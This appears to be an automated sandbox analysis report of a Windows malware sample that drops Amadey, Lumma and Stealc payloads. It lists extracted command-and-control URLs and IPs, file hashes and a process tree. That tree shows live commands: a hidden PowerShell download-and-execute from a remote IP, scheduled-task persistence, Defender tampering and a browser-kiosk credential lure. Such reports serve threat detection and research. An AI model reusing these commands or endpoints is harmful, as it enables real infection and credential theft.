Analysis
-
max time kernel
147s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
29/03/2025, 13:29
General
-
Target
random.exe
-
Size
938KB
-
MD5
ed19338ae7b4f14a6300a82555194914
-
SHA1
c4b17e900215a704197817f8d419b40a07d687e8
-
SHA256
7b5bd878343c3cecaee575c5046401e677127e53682f1894067af020d3bab1fa
-
SHA512
64fc35627f5790aa025d05515e8b353ed7825f0cfaf975304933d33b219ccbf7e8e41f9f83152a0a8315568b5195dbbb669d446f6a58f5d3f3a9b9937d16ddca
-
SSDEEP
24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8a0hu:9TvC/MTQYxsWR7a0h
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://esccapewz.run/ANSbwqy
https://travewlio.shop/ZNxbHi
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://holidamyup.today/AOzkns
https://mtriplooqp.world/APowko
https://wxayfarer.live/ALosnz
https://70oreheatq.live/gsopp
https://0castmaxw.run/ganzde
https://weldorae.digital/geds
https://steelixr.live/aguiz
https://smeltingt.run/giiaus
https://ferromny.digital/gwpd
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
-
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
-
Gcleaner family
-
Healer
Healer an antivirus disabler dropper.
-
Healer family
-
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
-
Lumma family
-
Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
-
Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
-
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
-
Stealc
Stealc is an infostealer written in C++.
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file 16 IoCs
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 20 IoCs
-
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 51 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 14 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 38 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Kills process with taskkill 5 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies registry class 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 35 IoCs
-
Suspicious use of AdjustPrivilegeToken 11 IoCs
-
Suspicious use of FindShellTrayWindow 21 IoCs
-
Suspicious use of SendNotifyMessage 19 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn JQ03EmaJ66N /tr "mshta C:\Users\Admin\AppData\Local\Temp\V8iHZWhuo.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn JQ03EmaJ66N /tr "mshta C:\Users\Admin\AppData\Local\Temp\V8iHZWhuo.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\V8iHZWhuo.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RRVT6TTCCLZBJ5QMUX82HTIT4AJMJLUS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\TempRRVT6TTCCLZBJ5QMUX82HTIT4AJMJLUS.EXE"C:\Users\Admin\AppData\Local\TempRRVT6TTCCLZBJ5QMUX82HTIT4AJMJLUS.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\10369360101\a9668c11e7.exe"C:\Users\Admin\AppData\Local\Temp\10369360101\a9668c11e7.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10369370101\83940b8e4a.exe"C:\Users\Admin\AppData\Local\Temp\10369370101\83940b8e4a.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10369380101\520e7d843f.exe"C:\Users\Admin\AppData\Local\Temp\10369380101\520e7d843f.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10369390101\4bea0f894f.exe"C:\Users\Admin\AppData\Local\Temp\10369390101\4bea0f894f.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2560.0.841177299\1228958909" -parentBuildID 20221007134813 -prefsHandle 1276 -prefMapHandle 1268 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {90b6217d-424c-4dc3-8365-ec85a599c589} 2560 "\\.\pipe\gecko-crash-server-pipe.2560" 1348 43d9a58 gpu9⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2560.1.1048006703\1288002671" -parentBuildID 20221007134813 -prefsHandle 1552 -prefMapHandle 1548 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e1662fe-69d4-4876-8686-1afe5a3e6c5c} 2560 "\\.\pipe\gecko-crash-server-pipe.2560" 1564 4303258 socket9⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2560.2.422405563\983282003" -childID 1 -isForBrowser -prefsHandle 2092 -prefMapHandle 2088 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9414912b-15fa-4b13-be0c-b08def85c3af} 2560 "\\.\pipe\gecko-crash-server-pipe.2560" 2104 4362c58 tab9⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2560.3.103411257\999676388" -childID 2 -isForBrowser -prefsHandle 2812 -prefMapHandle 2808 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {727e718d-9806-4e3f-8d9d-176aa0b83fc2} 2560 "\\.\pipe\gecko-crash-server-pipe.2560" 2824 1ce7d258 tab9⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2560.4.335734244\131977035" -childID 3 -isForBrowser -prefsHandle 3780 -prefMapHandle 3460 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {03e8a8b7-4a6d-41dd-8079-88cd83a5fee2} 2560 "\\.\pipe\gecko-crash-server-pipe.2560" 3884 205f8b58 tab9⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2560.5.51625914\844829355" -childID 4 -isForBrowser -prefsHandle 4000 -prefMapHandle 4004 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cfede792-180f-47ea-941e-d4034e302481} 2560 "\\.\pipe\gecko-crash-server-pipe.2560" 3988 205f8e58 tab9⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2560.6.4732170\1397253487" -childID 5 -isForBrowser -prefsHandle 4112 -prefMapHandle 4116 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 840 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60608fe0-ed70-4e7b-ae62-dc0efd09bcf2} 2560 "\\.\pipe\gecko-crash-server-pipe.2560" 4104 205f9458 tab9⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369400101\e3e1d0eb7c.exe"C:\Users\Admin\AppData\Local\Temp\10369400101\e3e1d0eb7c.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\10369430101\80957ab95c.exe"C:\Users\Admin\AppData\Local\Temp\10369430101\80957ab95c.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10369430101\80957ab95c.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369440101\b9aa42eccd.exe"C:\Users\Admin\AppData\Local\Temp\10369440101\b9aa42eccd.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10369440101\b9aa42eccd.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369460101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10369460101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10369470101\54685a9cee.exe"C:\Users\Admin\AppData\Local\Temp\10369470101\54685a9cee.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10369480101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10369480101\TbV75ZR.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3264 -s 447⤵
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369490101\hYjiwV0.exe"C:\Users\Admin\AppData\Local\Temp\10369490101\hYjiwV0.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3352 -s 447⤵
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369500101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10369500101\EPTwCQd.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 940 -s 287⤵
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369510101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10369510101\7IIl2eE.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183778⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 58⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369520101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10369520101\u75a1_003.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\10369530101\bff3a096dd.exe"C:\Users\Admin\AppData\Local\Temp\10369530101\bff3a096dd.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3312 -s 647⤵
- Loads dropped DLL
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
7Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.0MB
MD52cb4cdd698f1cbc9268d2c6bcd592077
SHA186e68f04bc99f21c9d6e32930c3709b371946165
SHA256c89a0fea7c3850c8bf4b6a231a34cfb699c97783b1b2b1176070dd4d9cb4bd4a
SHA512606216ce50d2c89f4700fd3f8853b09f5626615cac64bfe304c15524a908b4a220abed1a023b0f099d390a2e5b14e1dc4f94840aa398658188ad299c93939de3
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
23KB
MD53b3f9d143afe54c509e988d3e5c20174
SHA1a662896d8c11c723fbbf632bf384c51ba2d64b9c
SHA256a7ac8b2363bb2db969243146b5aecd407522005e0094ff4c728ed71610953772
SHA512c88b668bebbfca13b2a86b7b747624df806e88639c32b9463b754694915b0a418bce7130d5383114baf7e69388c33c13b730db4f0b69e0cecd528c507989e9b2
-
Filesize
15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
1.8MB
MD5d0cbe9aac0d5776545e7d4b711d6f821
SHA1628b4b7c5f1b207f09b1df48ea0eb1e854d0214e
SHA256ceac78262795d24823183f8117e6f4c779ac65f4fb1d7144dcc7187e5a09a38f
SHA512f0f73350a709ea244fc89ea73dda7993ad0b3b2e8394809954bfb33b44424c50138a461fe50bf61914028ab34ab908e36aea3fafcfd1dc8ec5dfd96f6ae3278d
-
Filesize
2.8MB
MD5ecff590568143edfc92c573a5eae5233
SHA10071b9e96909531a2ccab14061dd6df27d9db7a3
SHA2566b49588779d6a9c56b2d433acea7d57783694e21b48713319ed3374c45665fc5
SHA512a222c6987ae5aaa966df181c2269668750fabe210c4d73dc7605b8881b17699de0c1a8b0f753ceb670979356aa8ba03e82fffe766c30ca00d8af46c0f0153351
-
Filesize
1.8MB
MD5ae29aa6f4a0e1b29afe1b1b8ca912adf
SHA1a05d14e2ed51a4eeebe8103aad6807051677b5c6
SHA256f2edd51e6e92a4fe11bd6a86183fd0e34c87fe2c98f3f268d0cdc16d63124ac5
SHA51279aae0dc84427fbe4a9f634e491f248363b2ad8115d98e6f447d80a71866def6b2e5e479480588b64b944afd71c598b2cdf1533719dd073a1de87c343c8b4589
-
Filesize
947KB
MD525849e9a78cc4611472b9e21f1869fe6
SHA17a0b59f1930f74915c0aaec93a8c8767d58e3cc6
SHA2561d74d1344f690739b1d726b7da10f871839407a5b08f7d3f3b65d2cf41489c64
SHA512a49e277c3d0152f65e68dbe304a26ff1b64c3f985ac98e78b215f3f916820d387e22d32f24ccc02aad20d8bf57ae60b8533943d724a4f2a8339aa8c07d7afb42
-
Filesize
1.6MB
MD540d819bd28a035623cdebe10c887b113
SHA17d4b9beaa0592077a5d172e9127478adcd36affc
SHA256cb1017e85caf287f4260998def450cff642afc3470ca90967885b2d8521bdbb5
SHA512e659adf8e32f1ab61942401542fef498610c2d96dbfc49c8c45dcf6633439da36f42a2a97464854cf34603b9696fc5ac7e45948df448d52032fd6f8a3c54dbf8
-
Filesize
4.4MB
MD5c8c02c1fa779a2319f82a1de600149f0
SHA142d1512e1ea6eead8cd0a11b7b1a200feb6e28b3
SHA2562e9182478d0e659c8721bf2103897c496f23b49b4e701e9549b9ff0a84c4fa67
SHA51263f68101bc1d4e5df3e748f6386d6dd2c0b743ecb8d9727c76b66e1cc2bd9c4366fadd184a4ca20222340c7de30724c87cd6b307b771521870c3c38ba24ee6e0
-
Filesize
4.4MB
MD57b6ba738a78a1b7b50fba7ab3968bd0f
SHA1a2f0b69f915d18d9524d22e669171eb673450c82
SHA25663e071fcb985ed0ff8f730869f7a27cff8b5c6b2b11aea44fcc030306ebaf963
SHA51211545e7edbfb117a51a25b5520ad21b7091a07dab7200c12f7bcacb0afff60160ef9d0f4febbf62fa7919dcb3baecb58a387c818906bb6ac106e2504311bccb6
-
Filesize
354KB
MD527f0df9e1937b002dbd367826c7cfeaf
SHA17d66f804665b531746d1a94314b8f78343e3eb4f
SHA256aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209
SHA512ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17
-
Filesize
2.1MB
MD519e31a1b28028f14f86200065a2050af
SHA1b41f9918bbc585b05b39f27a8609fa91608f6426
SHA256122a70217bdaa237e87e735a099b5672f1f08f0ee3932e9f4df9f556c2dae746
SHA512024a2ad1a7be46cd164956bb14e541e8677f0fda64f0a3d7b25773e6263a53a0492fb469d38e24f9ded36174a7c89f736bd0bd5b1c6bb701e5606d72fac02172
-
Filesize
991KB
MD5beb1a5aac6f71ada04803c5c0223786f
SHA1527db697b2b2b5e4a05146aed41025fc963bdbcc
SHA256c2d045884d11777182129a96557ffc118ef0e8eb729b47766b4e003688d8c9c2
SHA512d0fa9b0f749c0b78a491ad44990733f1d1292ca9b5a45fe8fec750fa716a067bf9926481e8a4a131063442c92f7671145fae2238f32bd1f444920f3ed8a9b243
-
Filesize
634KB
MD54e84cb2a5369e3407e1256773ae4ad15
SHA1ab1a10e3d2c6b4e7623fe9740cfc84e3b2ae6ef5
SHA256110a54e185a48812d3ae0b45a0947945dc33de2476f89f571b9e1ef6801c0590
SHA51296e67ab56f75669c595c543f2f1c7e11ba62028271b7fa07104fdd0e70cdb502f20047991141cfc248e8f6ad9cfd1eff11e09b3ea6dcc4c8f62004bd17dd0988
-
Filesize
712KB
MD519cc136b64066f972db18ef9cc2da8ca
SHA1b6c139090c0e3d13f4e67e4007cec0589820cf91
SHA256d20816d1e73f63beaea4bee9afc4388d07b7235a3a332674e969b646cc454597
SHA512a3e5f486289d49978ad4e76c83667ba065efe0d061de7c9b4a88b68a167a7ac0e09d850583e15f274862880dcb6f76c51586bbc4be53419d403a0c7a3ce14434
-
Filesize
1.2MB
MD57d842fd43659b1a8507b2555770fb23e
SHA13ae9e31388cbc02d4b68a264bbfaa6f98dd0c328
SHA25666b181b9b35cbbdff3b8d16ca3c04e0ab34d16f5ebc55a9a8b476a1feded970a
SHA512d7e0a845a1a4e02f0e0e9cf13aa8d0014587ebef1d9f3b16f7d3d9f3dc5cdc2a17aa969af81b5dc4f140b2d540820d39317b604785019f1cbfa50d785970493b
-
Filesize
1.3MB
MD59498aeaa922b982c0d373949a9fff03e
SHA198635c528c10a6f07dab7448de75abf885335524
SHA2569a8f3a6dd5a2ee6b29a558629ffe66170e09dac76e75f573382a3520af287a80
SHA512c93871253c525a858f32451bc42783dea980e6bc15a786283e81e087e35ba423dd458fc46830985131ed0f1f95cda73e56e99c983e5743e110e3bfb2c1281d45
-
Filesize
1.1MB
MD596fa728730da64d7d6049c305c40232c
SHA13fd03c4f32e3f9dbcc617507a7a842afb668c4de
SHA25628d15f133c8ea7bf4c985207eefdc4c8c324ff2552df730f8861fcc041bc3e93
SHA512c66458fcb654079c4d622aa30536f8fbdef64fe086b8ca5f55813f18cb0d511bc25b846deec80895b303151dfe232ca2f755b0ad54d3bafcf2aec7ff318dbcbe
-
Filesize
25KB
MD5ccc575a89c40d35363d3fde0dc6d2a70
SHA17c068da9c9bb8c33b36aed898fbd39aa061c4ba4
SHA256c3869bea8544908e2b56171d8cad584bd70d6a81651ca5c7338bb9f67249500e
SHA512466d3399155a36f2ebc8908dba2838736a2effe4a337a3c49ff57afc59e3394f71c494daa70b02cb13461c3e89c6ad3889e6067a8938d29f832810d41f7d5826
-
Filesize
717B
MD5a11f9a4c98827413e946b52001737f62
